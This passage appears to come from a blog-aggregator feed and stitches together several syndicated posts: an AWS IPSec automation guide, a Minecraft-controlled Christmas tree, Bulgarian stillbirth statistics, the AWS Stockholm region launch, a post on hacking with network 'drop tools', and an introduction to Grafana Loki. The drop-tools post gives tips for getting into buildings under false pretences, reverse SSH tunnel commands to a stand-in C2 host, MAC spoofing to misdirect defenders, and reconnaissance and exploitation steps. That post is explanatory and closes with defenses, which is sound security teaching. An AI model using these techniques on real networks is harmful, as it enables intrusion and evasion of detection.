  11. The Reenrollcertificates Lambda function triggers the IPSecSetup Lambda (call event type: execution). The IPSecSetup Lambda will renew the certificate only, leaving the rest of the configuration untouched.
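
The actual logic ships in the Lambda packages uploaded during installation (for example, ipsec_setup_lambda_function.zip). Purely to illustrate steps 1 and 2, here is a hedged sketch of how such a handler could react to the launch event and check the IPSec:todo tag; the function name it invokes and the payload shape are assumptions, not the solution’s real code:

        import json

        import boto3

        ec2 = boto3.client("ec2")
        lmb = boto3.client("lambda")

        def handler(event, context):
            instance_id = event["detail"]["instance-id"]

            # Look up the instance tags and skip instances not marked IPSec:todo.
            reservations = ec2.describe_instances(InstanceIds=[instance_id])["Reservations"]
            tags = {t["Key"]: t["Value"]
                    for r in reservations
                    for i in r["Instances"]
                    for t in i.get("Tags", [])}
            if tags.get("IPSec") != "todo":
                return {"skipped": instance_id}

            # Hand off to the certificate-issuing Lambda (name is a placeholder).
            lmb.invoke(
                FunctionName="GenerateCertificate-ipsec-mystack",
                InvocationType="RequestResponse",
                Payload=json.dumps({"instance-id": instance_id}),
            )
            return {"enrolled": instance_id}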

Testing the connection on the EC2 instance

You can log in to the instance and ping one of the hosts in your network. This will trigger the IPSec connection and you should see successful answers.


        $ ping 172.31.1.26
        
        PING 172.31.1.26 (172.31.1.26) 56(84) bytes of data.
        64 bytes from 172.31.1.26: icmp_seq=2 ttl=255 time=0.722 ms
        64 bytes from 172.31.1.26: icmp_seq=3 ttl=255 time=0.483 ms
        

To see a list of IPSec tunnels you can execute the following:


        sudo ipsec whack --trafficstatus
        

Here is an example of the execution:
 

Figure 7: Example execution

Figure 7: Example execution

Changing your configuration or installing it on already running instances

All configuration lives in the source bucket (default: ipsec-source prefix), in files that follow the standard libreswan format. If you need to change the configuration, follow these steps:

  1. Review and update the following files:
    1. oe-conf, which is the configuration for libreswan
    2. clear, private, private-or-clear and clear-or-private, which should contain your network ranges.
  2. Change the tag for the IPSec instance to
    IPSec:todo.
  3. Stop and Start the instance (don’t restart). This will retrigger the setup of the instance.
     
    Figure 8: Stop and start the instance

    Figure 8: Stop and start the instance

    1. As an alternative to step 3, if you prefer not to stop and start the instance, you can invoke the IPSecSetup Lambda function via a Test Event with a test JSON event in the following format (a boto3 sketch of the same invocation follows this list):
      
                      { "detail" :  
                          { "instance-id": "YOUR_INSTANCE_ID" }
                      }
              

      A sample of test event creation in the Lambda Design window is shown below:
       

      Figure 9: Sample test event creation

      Figure 9: Sample test event creation
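
The same invocation also works from a script; here is a minimal boto3 sketch, where the stack suffix in the function name and the instance ID are placeholders:

        import json

        import boto3

        lmb = boto3.client("lambda")
        response = lmb.invoke(
            FunctionName="IPSecSetup-ipsec-mystack",  # placeholder stack suffix
            InvocationType="RequestResponse",
            Payload=json.dumps({"detail": {"instance-id": "i-0123456789abcdef0"}}),
        )
        print(response["StatusCode"], response["Payload"].read().decode())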

Monitoring and alarms

The solution delivers IPSec/IKE metrics and SNS alarms in the case of errors. To monitor your IPSec environment, you can use Amazon CloudWatch. You can see metrics for active IPSec sessions, IKE/ESP errors, and connection shunts.
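
The metrics themselves are pushed from each instance by the cronIPSecStats.sh script installed by the solution. Purely as an illustration of the mechanism, here is a hedged sketch that publishes the number of established tunnels as a custom CloudWatch metric; the namespace and metric name are assumptions and not necessarily what the solution uses:

        import subprocess

        import boto3

        cloudwatch = boto3.client("cloudwatch")

        # `ipsec whack --trafficstatus` prints one line per established tunnel.
        output = subprocess.run(
            ["sudo", "ipsec", "whack", "--trafficstatus"],
            capture_output=True, text=True, check=True,
        ).stdout
        active_tunnels = sum(1 for line in output.splitlines() if line.strip())

        cloudwatch.put_metric_data(
            Namespace="IPSec",                  # assumed namespace
            MetricData=[{
                "MetricName": "ActiveTunnels",  # assumed metric name
                "Value": active_tunnels,
                "Unit": "Count",
            }],
        )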
 

Figure 10: View metrics for active IPSec sessions, IKE/ESP errors, and connection shunts

Figure 10: View metrics for active IPSec sessions, IKE/ESP errors, and connection shunts

There are two SNS topics and alarms configured for IPSec setup failure or certificate reenrollment failure. You will see an alarm and an SNS message. It’s very important that your administrator subscribes to notifications so that you can react quickly. If you receive an alarm, please use the information in the “Troubleshooting” section of this post, below.
 

Figure 11: Alarms

Figure 11: Alarms

Troubleshooting

Below, I’ve listed some common errors and how to troubleshoot them:
 

The IPSec Tag doesn’t change to IPSec:enabled upon EC2 launch.

  1. Wait 2 minutes after the EC2 instance launches, so that it becomes reachable for AWS SSM.
  2. Check that the EC2 Instance has the right role assigned for the SSM Agent. The role is provisioned by the solution named Ec2IPsec-{stackname}.
  3. Check that the SSM Agent is reachable via a NAT gateway, an Internet gateway, or a private SSM endpoint.
  4. For CentOS and RedHat, check that you’ve installed the SSM Agent. See “Launching the EC2 instance.”
  5. Check the output of the SSM Agent command execution in the EC2 service.
  6. Check the IPSecSetup Lambda logs in CloudWatch for details.

The IPSec connection is lost after a few hours and can only be established from one host (in one direction).

  1. Check that your Security Groups allow ESP Protocol and UDP 500. Security Groups are stateful. They may only allow a single direction for IPSec establishment.
  2. Check that your network ACL allows UDP 500 and ESP Protocol.

The SNS Alarm on IPSec reenrollment is triggered, but everything seems to work fine.

  1. Certificates are valid for 30 days and rotated every week. If the rotation fails, you have three weeks to fix the problem.
  2. Check that the EC2 instances are reachable over AWS SSM. If reachable, trigger the certificate rotation Lambda again.
  3. See the IPSecSetup Lambda logs in CloudWatch for details.

DNS Route 53, RDS, and other managed services are not reachable.

  1. DNS, RDS and other managed services do not support IPSec. You need to exclude them from encryption by listing them in the config/clear list. For more details see step 2 of Installation (one-time setup) in this blog.

Here are some additional general IPSec commands for troubleshooting:

Stopping IPSec can be done by executing the following unix command:


        sudo ipsec stop 
        

If you want to stop IPSec on all instances, you can execute this command via AWS Systems Manager on all instances with the tag IPSec:enabled. Stopping encryption means all traffic will be sent unencrypted.
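
Here is a hedged sketch of doing exactly that with the AWS SDK for Python; AWS-RunShellScript is the standard Systems Manager document for running shell commands, and the tag key/value follow the convention described above:

        import boto3

        ssm = boto3.client("ssm")

        # Run `sudo ipsec stop` on every instance tagged IPSec=enabled.
        # Remember: stopping IPSec means traffic is sent unencrypted.
        ssm.send_command(
            Targets=[{"Key": "tag:IPSec", "Values": ["enabled"]}],
            DocumentName="AWS-RunShellScript",
            Parameters={"commands": ["sudo ipsec stop"]},
            Comment="Stop IPSec on all enrolled instances",
        )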

If you want to have a fail-open case, meaning on IKE(IPSec) failure send the data unencrypted, then configure your network in config/private-or-clear as described in step 2 of Installation (one-time setup).

Debugging IPSec issues can be done using Libreswan commands. For example:


        sudo ipsec status 
        
        sudo ipsec whack --debug
        
        sudo ipsec barf 
        

Security

The CA key is encrypted using an Advanced Encryption Standard (AES) 256 CBC 128-byte secret and stored in a bucket with server-side encryption (SSE). The secret is envelope-encrypted with a CMK, following the AWS KMS envelope encryption pattern. Only the certificate-issuing Lambda function can decrypt the secret, as enforced by the KMS resource policy. The encrypted secret for the CA key is set in an encrypted environment variable of the certificate-issuing Lambda function.

The IPSec host private key is generated by the certificate-issuing Lambda function. The private key and certificate are encrypted with AES 256 CBC (PKCS12) and protected with a 128-byte secret generated by KMS. The secret is envelope-encrypted with a user CMK. Only the EC2 instances with attached IPSec IAM policy can decrypt the secret and private key.

The issuing of the certificate is a full synchronous call: One request and one corresponding response without any polling or similar sync/callbacks. The host private key is not stored in a database or an S3 bucket.

The issued certificates are valid for 30 days and are stored for auditing purposes in a certificates bucket without a private key.

Alternate subject names and multiple interfaces or secondary IPs

The certificate subject name and AltSubjectName attribute contains the private Domain Name System (DNS) of the EC2 and all private IPs assigned to the instance (interfaces, primary, and secondary IPs).

The provided default libreswan configuration covers a single interface. You can adjust the configuration according to libreswan documentation for multiple interfaces, for example, to cover Amazon Elastic Container Service for Kubernetes (Amazon EKS).

Conclusion

With the solution in this blog post, you can automate the process of building an encrypted IPSec layer for your EC2 instances to protect your workloads. You don’t need to worry about configuring certificates, monitoring, and alerting. The solution uses a combination of AWS KMS, IAM, AWS Lambda, CloudWatch and the libreswan implementation. If you need libreswan support, use the mailing list or GitHub. The AWS forums can give you more information on KMS and IAM. If you require a special enterprise enhancement, contact AWS professional services.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Vesselin Tzvetkov

Vesselin is senior security consultant at AWS Professional Services and is passionate about security architecture and engineering innovative solutions. Outside of technology, he likes classical music, philosophy, and sports. He holds a Ph.D. in security from TU-Darmstadt and a M.S. in electrical engineering from Bochum University in Germany.

Minecraft-controlled real world Christmas tree

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/minecraft-controlled-christmas-tree/

Interact with the real world via the block world, with the Minecraft-controlled Christmas tree from the team at BroCraft Gaming.

Illuminating

David Stevens of BroCraft Gaming reached out to us last month to let us know about the real-life Christmas tree he and his team were planning to hack using Minecraft. Intriguing? Obviously. And after a few more emails, David has been back in touch to let us know the tree hack is now live and ready for the world to interact with.

Here’s a blurb from the BroCraft team:

Join our Minecraft server at brocraftlive.net, complete the tutorial if you haven’t already, and type /mcct to join our snowy wonderland. Collect power from power blocks dotted everywhere, then select a pattern with the Technician, and watch as the tree lights up on the camera stream LIVE before your very eyes! Visit the attractions, play our minigames, and find out what else our server has to offer.

The tree uses individually addressable LEDs and the Adafruit Neopixel Python library. And with the help of a bespoke Java plugin, all instructions from within the Minecraft server are fed to the lights via a Raspberry Pi.
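
If you want to experiment with the LED side yourself, here is a minimal sketch using the Adafruit NeoPixel library on a Raspberry Pi. The GPIO pin and LED count are assumptions for illustration; BroCraft’s actual setup and Java plugin are not shown:

import time

import board
import neopixel

PIXEL_COUNT = 50  # assumed number of LEDs on the tree
pixels = neopixel.NeoPixel(board.D18, PIXEL_COUNT, brightness=0.3, auto_write=False)

# Simple festive pattern: alternate red and green, swapping every half second.
while True:
    for offset in (0, 1):
        for i in range(PIXEL_COUNT):
            pixels[i] = (255, 0, 0) if (i + offset) % 2 == 0 else (0, 255, 0)
        pixels.show()
        time.sleep(0.5)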

You can view the live Christmas tree camera stream here, along with a brief FAQ on interacting with the tree within the BroCraft Minecraft server.

Minecraft Pi

You’ll need access to Minecraft to be able to interact with the tree. And, lucky for you, Minecraft Pi comes free with Raspbian on the Raspberry Pi!

To flash the Raspbian image onto an SD card, follow this video tutorial from the team at The MagPi. And to get more acquainted with Minecraft on the Raspberry Pi, check out our free resources, including the getting started guide, Minecraft selfies, and the big Minecraft piano.



Find more free Raspberry Pi resources on our projects site, and immerse yourself even further into the world of Minecraft Pi with The MagPi’s Hacking and Making in Minecraft Essentials Guide, available in print and as a free PDF download!

The post Minecraft-controlled real world Christmas tree appeared first on Raspberry Pi.

A Few Numbers on Stillbirths in Sliven

Post Syndicated from Боян Юруков original https://yurukov.net/blog/2018/martvorodeni-sliven/

Prompted by the latest fatal case in Sliven and the criticism of maternity care there, I dug into the data. In 2017 there were 2,391 births in Sliven, and 19 of them were stillbirths. That works out to almost 8 per 1,000 births; for comparison, the average for the whole country is 6.28. Last year there were 404 stillborn children in the country; this year there were 243 up to the beginning of October.

At first glance, the region shows some improvement over the last 18 years. Even so, the problem is much more serious than the national average. The peak was in 2008, when there were 38 stillbirths. Here I have shown the trend over the years; the figures for 2018 are based only on the first 9 months of the year.

Since the number of births is not large, and stillbirths themselves are few in absolute terms, the apparent decline may be deceptive. Every single case has a significant effect on this indicator, so with such a small sample it is hard to judge. That also explains the large year-to-year variation in Sliven, something not seen at the national level.

Another issue here is that the definitions of what counts as a miscarriage, a stillbirth, or a child who died after birth have changed over the years. From a personal point of view this mattered to the mothers; for the statistics, the effect was that some cases shifted between these indicators. These changes create a so-called break in sequence in the data and make comparisons across years somewhat harder. Here, for example, is the absolute number of stillbirths.

One argument I often see is that many of the fatal cases are due to the “predominant” number of underage mothers, mostly of Roma origin, in Sliven. While it is true that a sizeable share of births there are to people of that ethnicity, it is also true that a large share of the region’s population is Roma. That, along with the slightly above-average fertility of the Roma, explains the larger number of births.

What is not true, however, is that the majority of mothers are minors or underage. I have already written about this topic in detail. For Sliven specifically, the average age at the birth of the first child is 23.1 years, and at the birth of any child 25.2. It is probably because of this argument, by the way, that almost every news report conspicuously noted at the very start of the story that the mother was 27 and that this was her first child: perhaps to counter the presumption that she was from a “certain demographic” and to get readers to care enough to read on.

And the problem is serious. Although infant and maternal mortality are declining statistically, they still remain well above the European average. In some regions the causes really are specific, but overall there are serious problems with monitoring of pregnancies, health education, people lending an ear to nonsense on the internet, the approach of obstetricians and doctors themselves, and, not least, hospital-acquired infections. The health authorities bear responsibility for all of these to one degree or another, but non-governmental organizations and the mothers themselves play a role too. The last two problems, however, are the most serious and lie entirely in the hands of the hospitals. Real investigations, accountability, corrective measures, and strict adherence to working protocols are not something our healthcare institutions can boast about. While this is not a problem unique to Bulgaria, there is certainly no visible progress.

More on the topic:
Some data on maternity care in Bulgaria
This news could harm your health
Preventable deaths in Bulgaria: only half what you think
Sources: НСИ, НЦОЗА

Now Open – AWS Europe (Stockholm) Region

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/now-open-aws-europe-stockholm-region/

The AWS Region in Sweden that I promised you last year is now open and you can start using it today! The official name is Europe (Stockholm) and the API name is eu-north-1. This is our fifth region in Europe, joining the existing regions in Europe (Ireland), Europe (London), Europe (Frankfurt), and Europe (Paris). Together, these regions provide you with a total of 15 Availability Zones and allow you to architect applications that are resilient and fault tolerant. You now have yet another option to help you to serve your customers in the Nordics while keeping their data close to home.

Instances and Services
Applications running in this 3-AZ region can use C5, C5d, D2, I3, M5, M5d, R5, R5d, and T3 instances, and can use a long list of AWS services including Amazon API Gateway, Application Auto Scaling, AWS Artifact, AWS Certificate Manager (ACM), Amazon CloudFront, AWS CloudFormation, AWS CloudTrail, Amazon CloudWatch, CloudWatch Events, Amazon CloudWatch Logs, AWS CodeDeploy, AWS Config, AWS Config Rules, AWS Database Migration Service, AWS Direct Connect, Amazon DynamoDB, EC2 Auto Scaling, EC2 Dedicated Hosts, Amazon Elastic Container Service for Kubernetes, AWS Elastic Beanstalk, Amazon Elastic Block Store (EBS), Amazon Elastic Compute Cloud (EC2), Elastic Container Registry, Amazon ECS, Elastic Load Balancing (Classic, Network, and Application), Amazon EMR, Amazon ElastiCache, Amazon Elasticsearch Service, Amazon Glacier, AWS Identity and Access Management (IAM), Amazon Kinesis Data Streams, AWS Key Management Service (KMS), AWS Lambda, AWS Marketplace, AWS Organizations, AWS Personal Health Dashboard, AWS Resource Groups, Amazon RDS for Aurora, Amazon RDS for PostgreSQL, Amazon Route 53 (including Private DNS for VPCs), AWS Server Migration Service, AWS Shield Standard, Amazon Simple Notification Service (SNS), Amazon Simple Queue Service (SQS), Amazon Simple Storage Service (S3), Amazon Simple Workflow Service (SWF), AWS Step Functions, AWS Storage Gateway, AWS Support API, Amazon EC2 Systems Manager (SSM), AWS Trusted Advisor, Amazon Virtual Private Cloud, VM Import, and AWS X-Ray.

Edge Locations and Latency
CloudFront edge locations are already operational in four Nordic cities, in and around the new region:

  • Stockholm, Sweden (3 locations)
  • Copenhagen, Denmark
  • Helsinki, Finland
  • Oslo, Norway

AWS Direct Connect is also available in all of these locations.

The region also offers low-latency connections to other cities and AWS regions in the area.

AWS Customers in the Nordics
Tens of thousands of our customers in Denmark, Finland, Iceland, Norway, and Sweden already use AWS! Here’s a sampling:

Volvo Connected Solutions Group – AWS is their preferred cloud solution provider, allowing them to connect over 800,000 Volvo trucks, buses, construction equipment, and Penta engines. They make heavy use of microservices and will use the new region to deliver services with lower latency than ever before.

Fortum – Their one-megawatt Virtual Battery runs on top of AWS. The battery aggregates and controls usage of energy assets and allows Fortum to better balance energy usage across their grid. This results in lower energy costs and power bills, along with a reduced environmental impact.

Den Norske Bank – This financial services customer is using AWS to provide a modern banking experience for their customers. They can innovate and scale more rapidly, and have devoted an entire floor of their headquarters to AWS projects.

Finnish Rail – They are moving their website and travel applications to AWS in order to allow their developers to quickly experiment, build, test, and deliver personalized services for each of their customers.

And That Makes 20
With today’s launch, the AWS Cloud spans 60 Availability Zones within 20 geographic regions around the world. We are currently working on 12 more Availability Zones and four more AWS Regions in Bahrain, Cape Town, Hong Kong SAR, and Milan.

AWS services are GDPR ready and also include capabilities that are designed to support your own GDPR readiness efforts. To learn more, read the AWS Service Capabilities for GDPR and check out the AWS General Data Protection Regulation (GDPR) Center.

The Europe (Stockholm) Region is now open and you can start creating your AWS resources in it today!

Jeff;

Notes about hacking with drop tools

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/12/notes-about-hacking-with-drop-tools.html

In this report, Kaspersky found Eastern European banks hacked with Raspberry Pis and “Bash Bunnies” (DarkVishnya). I thought I’d write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 “netbooks” (cheap notebook computers). These days, it can be done with $50 “Raspberry Pi” computers, or even $25 consumer devices reflashed with Linux.

A “Raspberry Pi” is a $35 single-board computer, for which you’ll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used for everything from home servers to robotics to hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you’d do is install Kali Linux. This is a Linux “distro” that contains all the tools hackers want to use.

You then drop this box physically on the victim’s network. We often called these “dropboxes” in the past, but now that there’s a cloud service called “Dropbox”, this becomes confusing, so I guess we can call them “drop tools”. The advantage of using something like a Raspberry Pi is that it’s cheap: once dropped on a victim’s network, you probably won’t ever get it back again.

Gaining physical access to even secure banks isn’t that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren’t nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, staff will quickly give you whatever access you ask for if they think you are a regulator. Or, you can pretend to be a maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that’s not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You’ll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.

Now that you’ve got your evil box installed, there is the question of how you remotely access it. It’s almost certainly firewalled, preventing any inbound connection.

One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization’s outbound traffic can notice these connections.
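To make that concrete, here is a minimal sketch of the outbound reverse-SSH approach, assuming a throwaway C2 server and account you control (c2.example.com, the account name, and the port numbers are all placeholders):

  # On the drop device: hold open a reverse tunnel back to a server you control.
  ssh -N -R 2222:localhost:22 drop@c2.example.com
  # From the C2 server, you then reach the drop device through that tunnel:
  #   ssh -p 2222 pi@localhost
  # autossh keeps the tunnel alive if the connection drops:
  autossh -M 0 -f -N -R 2222:localhost:22 drop@c2.example.com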

Another alternative is to use WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it’s not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connect, and then using the bar’s Internet connection to hop-scotch on in.

The third alternative, which appears to be the one used in the article above, is to use a 3G/4G modem. You can get such modems for another $15 to $30. You can get “data only” plans, especially through MVNOs, for around $1 to $5 a month, especially prepaid plans that require no identification. These are “low bandwidth” plans designed for IoT command-and-control where only a few megabytes are transferred per month, which is perfect for command-line access to these drop tools.

With all this, you are looking at around $75 for the hardware, software, and 3G/4G plan for a year to remotely connect to a box on the target network.

As an alternative, you might instead use a cheap consumer router reflashed with the OpenWRT Linux distro. A good example would be a GL.iNet device for $19. This is a cheap Chinese manufacturer that makes inexpensive consumer routers designed specifically for us hackers who want to do creative things with them.

The benefit of such devices is that they look like the sorts of consumer devices that one might find on a local network. Raspberry Pi devices stand out as something suspicious, should they ever be discovered, but a reflashed consumer device looks trustworthy.

The problem with these devices is that they are significantly less powerful than a Raspberry Pi. The typical processor is usually single core around 500 MHz, and the typical memory is only around 32 to 128 megabytes. Moreover, while many hacker tools come precompiled for OpenWRT, you’ll end up having to build most of the tools yourself, which can be difficult and frustrating.

Hacking techniques

Once you’ve got your drop tool plugged into the network, then what do you do?

One question is how noisy you want to be, and how good you think the defenders are. The classic thing to do is run a port scanner like nmap or masscan to map out the network. This is extremely noisy and even clueless companies will investigate.

This can be partly mitigated by spoofing your MAC and IP addresses. However, a properly run network will still be able to trace the addresses back to the proper switch port. Therefore, you might want to play with a bunch of layer 2 tricks. For example, passively watch for devices that get turned off at night, then spoof their MAC address during your night-time scans, so that when they come back in the morning, the defenders will trace the activity back to the wrong device.
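A rough sketch of that MAC-borrowing trick; the interface name and the spoofed address are placeholders:

  # Take over the MAC of a workstation you watched go offline for the night.
  ip link set dev eth0 down
  ip link set dev eth0 address 00:11:22:33:44:55
  ip link set dev eth0 up
  # (macchanger --mac=00:11:22:33:44:55 eth0 does the same, also with the interface down)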

An easier thing is to passively watch what’s going on. In purely passive mode, they really can’t detect that you exist at all on the network, other than the fact that the switch port reports something connected. By passively looking at ARP packets, you can get a list of all the devices on your local segment. By passively looking at Windows broadcasts, you can map out large parts of what’s going on with Windows. You can also find MacBooks, NAT routers, SIP phones, and so on.
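For example, purely passive listening needs nothing more than tcpdump; the interface name is a placeholder, and nothing is transmitted:

  tcpdump -i eth0 -e -nn arp                          # who is on the local segment
  tcpdump -i eth0 -nn udp port 137 or udp port 138    # Windows/NetBIOS broadcasts
  tcpdump -i eth0 -nn port 5353 or port 1900          # mDNS and SSDP: Macs, printers, NAT routers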

This allows you to then target individual machines rather than causing a lot of noise on the network, and therefore go undetected.

If you’ve got a target machine, the typical procedure is to port scan it with nmap, find the versions of software running that may have known vulnerabilities, then use metasploit to exploit those vulnerabilities. If it’s a web server, then you might use something like burpsuite in order to find things like SQL injection. If it’s a Windows desktop/server, then you’ll start by looking for unauthenticated file shares, attempting man-in-the-middle attacks, or exploiting it with something like EternalBlue.
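A hedged sketch of that loop against a single host (the address and output file names are placeholders):

  nmap -sV -p- 10.0.0.42 -oA target42                 # scan all ports with service/version detection
  nmap -p 445 --script smb-enum-shares 10.0.0.42      # look for open or unauthenticated SMB shares
  # Anything running a version with a known CVE then goes into metasploit:
  # run msfconsole and use "search <service> <version>" to find a matching exploit module.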

The sorts of things you can do are endless; just read any guide on how to use Kali Linux and follow those examples.

Note that your command-line connection may be a low-bandwidth 3G/4G connection, but when it’s time to exfiltrate data, you’ll probably use the corporate Internet connection to transfer gigabytes of data.

USB hacking tools

The report above described not only drop tools attached to the network, but also tools attached via USB. This is a wholly separate form of hacking.

According to the description, the hackers used BashBunny, a $100 USB device. It’s a computer that can emulate things like a keyboard.

However, a cheaper alternative is the Raspberry Pi Zero W for $15, with Kali Linux installed, especially a Kali derivative like this one that has USB attack tools built in and configured.

One set of attacks is through a virtual keyboard and mouse. It can keep causing mouse/keyboard activity invisibly in the background to avoid the automatic lockout, then presumably at night, run commands that will download and run evil scripts. A good example is the “fileless PowerShell” scripts mentioned in the article above.

This may be combined with emulation of a flash drive. In the old days, hostile flash drives could directly infect a Windows computer once plugged in. These days, that won’t happen without interaction by the user — interaction using a keyboard/mouse, which the device can also emulate.

Another set of attacks is pretending to be a USB Ethernet connection. This allows network attacks, such as those mentioned above, to travel across the USB port, without being detectable on the real network. It also allows additional tricks. For example, it can configure itself to be the default route for Internet (rather than local) access, redirecting all web access to a hostile device on the Internet. In other words, the device will usually be limited in that it doesn’t itself have access to the Internet, but it can confuse the network configuration of the Windows device to cause other bad effects.

Another creative use is to emulate a serial port. This works for a lot of consumer devices and things running Linux. This will get you a shell directly on the device, or a login that accepts a default or well-known backdoor password. This is a widespread vulnerability because it’s so unexpected.

In theory, any USB device could be emulated. Today’s Windows, Linux, and macOS machines have a lot of device drivers that are full of vulnerabilities that can be exploited. However, I don’t see any easy-to-use hacking toolkits that’ll make this easy for you, so this is still mostly theoretical.

Defense

The purpose of this blogpost isn’t “how to hack” but “how to defend”. Understanding what attackers do is the first step in understanding how to stop them.

Companies need to understand the hardware on their network. They should be able to list all the hardware devices on all their switches and keep a running log of any new device that connects. They need to be able to quickly find the physical location of any device, with well-documented cabling and tracking of which MAC address belongs to which switch port. Better yet, 802.1X should be used to require authentication on Ethernet just like you require authentication on WiFi.

The same should be done for USB. Whenever a new USB device is plugged into Windows, that should be logged somewhere. I would suggest policies banning USB devices, but they are so useful that this can become very costly to do right.

Companies should have enough monitoring that they can be notified whenever somebody runs a scanner like nmap. Better yet, they should have honeypot devices and services spread throughout their network that will notify them if somebody is already inside their network.
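On the hardware-inventory point above, even a small tool like arpwatch goes a long way. A minimal sketch, assuming a Debian/Ubuntu monitoring box with a view of the segment:

  apt-get install arpwatch     # assumption: a Debian/Ubuntu box plugged into the segment you care about
  arpwatch -i eth0             # logs (and mails root about) every new MAC/IP pairing it sees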

Conclusion

Hacking a target like a bank consists of three main phases: getting in from the outside, moving around inside the network to get to the juicy bits, then stealing money/data (or causing harm). That first stage is usually the hardest, and it can be bypassed with physical access, by dropping some sort of computer on the network. A $50 device like a Raspberry Pi running Kali Linux is perfect for this.

Every security professional should have hands-on experience with this, whether it’s an actual Raspberry Pi or just a VM on a laptop running Kali. They should run nmap on their own network, run burpsuite against their intranet websites, and so on. Of course, this should only be done with knowledge and permission from their bosses, and ideally their boss’s bosses.

Loki: Prometheus-inspired, open source logging for cloud natives

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/12/12/loki-prometheus-inspired-open-source-logging-for-cloud-natives/

Loki

Introduction

This blog post is a companion piece for my talk at https://devopsdaysindia.org. I will discuss the motivations, architecture, and the future of logging in Grafana! Let’s get right down to it. You can see the slides for the talk here: https://speakerdeck.com/gouthamve/devopsdaysindia-2018-loki-prometheus-but-for-logs

Motivation

Grafana is the de facto dashboarding solution for time-series data. It supports over 40 datasources (as of this writing), and the dashboarding story has matured considerably with new features, including the addition of teams and folders. We now want to move on from being a dashboarding solution to being an observability platform, the go-to place when you need to debug systems on fire.

Full Observability

Observability. There are a lot of definitions out there as to what that means. Observability to me is visibility into your systems and how they are behaving and performing. I quite like the model where observability can be split into 3 parts (or pillars): metrics, logs, and traces, each complementing the others to help you figure out what’s wrong quickly.

The following example illustrates how I tackle incidents at my job:
how I tackle incidents

Prometheus sends me an alert that something is wrong and I open the relevant dashboard for the service. If I find a panel or graph anomalous, I’ll open the query in Grafana’s new Explore UI for a deeper dive. For example, if I find that one of the services is throwing 500 errors, I’ll try to figure out if a particular handler/route is throwing that error or if all instances are throwing the error, etc.

Next up, once I have a vague mental model as to what is going wrong or where it is going wrong, I’ll look at logs. Pre-Loki, I used kubectl to get the relevant logs to see what the error was and whether I could do something about it. This works great for errors, but sometimes I get paged due to high latency. In this situation I get more info from traces regarding what is slow and which method/operation/function is slow. We use Jaeger to get the traces.

While these didn’t always directly tell me what was wrong, they usually got me close enough to look at the code and figure out what was going on. Then I can either scale up the service (if it is overloaded) or deploy the fix.

Logging

Prometheus works great, Jaeger is getting there, and kubectl was decent. The label model was powerful enough for me to get to the bottom of erroring services. If I found that the ingester service was erroring, I’d do: kubectl --namespace prod logs -l name=ingester | grep XXX to get the relevant logs and grep through them.

If I found a particular instance was erroring or if I wanted to tail the logs of a service, I’d have to use the individual pod for tailing as kubectl doesn’t let you tail based on label selectors. This is not ideal, but works for most use-cases.
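A rough workaround sketch from that era, tailing each matching pod in its own background stream (namespace and label are taken from the example above):

  for pod in $(kubectl --namespace prod get pods -l name=ingester -o name); do
    kubectl --namespace prod logs -f "$pod" &
  done
  wait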

This worked, as long as the pod wasn’t crashing or wasn’t being replaced. If the pod or node is terminated, the logs are lost forever. Also, kubectl only stores recent logs, so we’re blind when we want logs from the day before or earlier. Further, having to jump from Grafana to CLI and back again wasn’t ideal. We needed a solution that reduced context switching, and many of the solutions we explored were super pricey or didn’t scale very well.

This was expected as they do waaaay more than select + grep, which is essentially what we needed. After looking at existing solutions, we decided to build our own.

Loki

Not happy with any of the open-source solutions, we started speaking to people and noticed that A LOT of people had the same issues. In fact, I’ve come to realise that lots of developers still SSH in and grep/tail the logs on machines even today! The solutions they were using were either too pricey or not stable enough. In fact, people were being asked to log less, which we think is an anti-pattern for logs. We thought we could build something that we internally, and the wider open-source community, could use. We had one main goal:

  • Keep it simple. Just support grep!


This tweet from @alicegoldfuss is not an endorsement and only serves to illustrate the problem Loki is attempting to solve

We also aimed for a few other things:

  • Logs should be cheap. Nobody should be asked to log less.
  • Easy to operate and scale.
  • Metrics, logs (and traces later) need to work together.

The final point was important. We were already collecting metadata from Prometheus for the metrics and we wanted to use it for log correlation. For example, Prometheus tags each metric with the namespace, service name, instance IP, etc. When I get an alert, I use the metadata to figure out where to look for logs. If we manage to tag the logs with the same metadata, we can seamlessly switch between metrics and logs. You can see the internal design doc we wrote here. See a demo video of Loki in action below:

Video: Loki – Prometheus-inspired, open source logging for cloud natives.

Architecture

With our experience building and running Cortex (the horizontally scalable, distributed version of Prometheus that we run as a service), we came up with the following architecture:

Logging architecture!

Matching metadata between metrics and logs is critical for us, and we initially decided to target just Kubernetes. The idea is to run a log-collection agent on each node, collect logs using that agent, talk to the Kubernetes API to figure out the right metadata for the logs, and send them to a central service which we can use to show the logs collected inside Grafana.

The agent supports the same configuration (relabelling rules) as Prometheus to make sure the metadata matches. We called this agent promtail.

Enter Loki, the scalable log collection engine.
Logging architecture!

The write path and the read path (query) are pretty decoupled from each other, and it helps to talk about each of them separately.
Loki: Architecture!

